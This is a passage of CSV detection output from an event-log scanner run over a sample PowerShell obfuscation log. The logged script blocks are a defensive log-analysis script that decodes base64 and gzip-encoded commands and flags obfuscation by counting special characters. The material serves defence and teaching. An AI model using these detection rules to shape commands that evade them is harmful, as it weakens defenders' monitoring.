@{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:59:31.974 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command 
Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if 
(Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" 
{$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. 
# If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'""",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:59:31.974 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. 
# If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:59:31.974 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:59:31.974 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! 
characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace "">"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars > characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:59:31.974 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! 
characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace "">"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars > characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:59:31.977 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. 
$groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ 
$image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:59:31.985 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, 
check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:59:31.987 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not 
